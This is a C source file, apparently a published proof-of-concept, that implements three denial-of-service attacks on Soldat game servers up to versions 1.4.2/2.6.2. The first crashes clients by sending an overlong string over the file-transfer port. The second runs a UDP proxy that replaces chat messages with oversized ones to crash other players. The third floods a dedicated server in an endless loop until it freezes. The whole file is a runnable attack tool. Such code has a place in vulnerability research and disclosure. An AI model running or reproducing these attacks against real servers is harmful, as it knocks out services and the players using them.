/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define sleepms sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define sleepms(x)  usleep(x * 1000)
    #define ONESEC  1
    #define stristr strcasestr
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define FPORT       23083
#define GPORT       23073
#define LPORT       22222
#define BUFFSZ      16384
#define SENDTO(a,b,c,d) \
                    if(sendto(a, b, c, 0, (struct sockaddr *)d, sizeof(struct sockaddr_in)) \
                      < 0) std_err();



void miniproxy(struct sockaddr_in *peer, struct sockaddr_in *peerl, u8 *buff);
int tcp_send_recv(struct sockaddr_in *peer, u8 *in, int inlen, u8 *out, int outlen);
int timeout(int sock);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer,
                        peerl;
    int     len,
            attack;
    u16     port;
    u8      *buff;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Soldat <= 1.4.2/2.6.2 multiple DoS "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port]\n"
            "\n"
            "Attacks:\n"
            " 1 = clients crash caused by too long strings on the screen\n"
            "     game server exploited through the file transfer por %hu\n"
            " 2 = as above but exploited through a long chat message, default port %hu\n"
            " 3 = denial of service through file transfer port (dedicated servers only)\n"
            "\n", argv[0], FPORT, GPORT);
        exit(1);
    }

    attack = atoi(argv[1]);
    port = FPORT;
    if(attack == 2) port = GPORT;

    if(argc > 3) port = atoi(argv[3]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    if(attack == 1) {
        len = 16384;
        memset(buff, 'a', len);
        buff[len - 1] = '\n';

        len = tcp_send_recv(&peer, buff, len, buff, BUFFSZ);

        printf("- if the server was non-dedicated now it should have been crashed\n");

    } else if(attack == 2) {
        peerl.sin_addr.s_addr = INADDR_ANY;
        peerl.sin_port        = htons(LPORT);
        peerl.sin_family      = AF_INET;

        miniproxy(&peer, &peerl, buff);

    } else if(attack == 3) {
        printf("- start attack in endless loop, the dedicated server should beep and freeze:\n");

        for(;;) {
            len = 16384;
            memset(buff, 0x07, len);
            buff[len - 1] = '\n';

            len = tcp_send_recv(&peer, buff, len, buff, BUFFSZ);

            sleep(ONESEC);
        }
    }

    free(buff);
    return(0);
}



    // I have adopted the proxy solution because I don't have time and desire
    // to reverse the cipher method used by Soldat... for one byte only

void miniproxy(struct sockaddr_in *peer, struct sockaddr_in *peerl, u8 *buff) {
    fd_set  rset;
    int     sd,
            sdl,
            selsock,
            len,
            on      = 1,
            psz;

    psz = sizeof(struct sockaddr_in);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    printf("- ping server\n");
    SENDTO(sd, "\x69", 1, peer)
    if(timeout(sd) < 0) {
        printf("\nError: socket timeout, check if the target port is correct!\n");
        exit(1);
    }
    len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)peer, &psz);
    if(len < 0) std_err();

    printf("- bind port %hu\n", ntohs(peerl->sin_port));
    sdl = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sdl < 0) std_err();
    if(setsockopt(sdl, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
      < 0) std_err();
    if(bind(sdl, (struct sockaddr *)peerl, sizeof(struct sockaddr_in))
      < 0) std_err();

    printf(
        "- now join the server 127.0.0.1:%hu\n"
        "  if you will type a chat message containing the word \"crash\" any vulnerable\n"
        "  client in the target server will be crashed except you (I limit the reply)\n",
        ntohs(peerl->sin_port));

    selsock = 1 + ((sd > sdl) ? sd : sdl);

    for(;;) {
        FD_ZERO(&rset);
        FD_SET(sd,  &rset);
        FD_SET(sdl, &rset);
        if(select(selsock, &rset, NULL, NULL, NULL)
          < 0) std_err();

        if(FD_ISSET(sd,  &rset)) {          // server
            len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)peer, &psz);
            if(len < 0) break;

            if((buff[0] == 0x06) && (len > 400)) {
                len = 400;
                printf("- limit incoming big packet length\n");
            }

            SENDTO(sdl, buff, len, peerl)
        }

        if(FD_ISSET(sdl, &rset)) {          // client
            len = recvfrom(sdl, buff, BUFFSZ, 0, (struct sockaddr *)peerl, &psz);
            if(len < 0) break;

            if((buff[0] == 0x06) && stristr(buff + 3, "crash")) {
                printf("- exploit the big chat message bug\n");
                len = 600;
                memset(buff + 3, 'a', len - 3);
                buff[len - 1] = 0;
            }

            SENDTO(sd, buff, len, peer)
        }
    }

    free(buff);
}



int tcp_send_recv(struct sockaddr_in *peer, u8 *in, int inlen, u8 *out, int outlen) {
    int     sd;

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    printf("- connect...");
    if(connect(sd, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
      < 0) std_err();
    printf("ok\n");

    if(send(sd, in, inlen, 0)
      < 0) std_err();

    outlen = recv(sd, out, outlen, 0);
    if(outlen < 0) std_err();

    close(sd);
    return(outlen);
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = 2;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


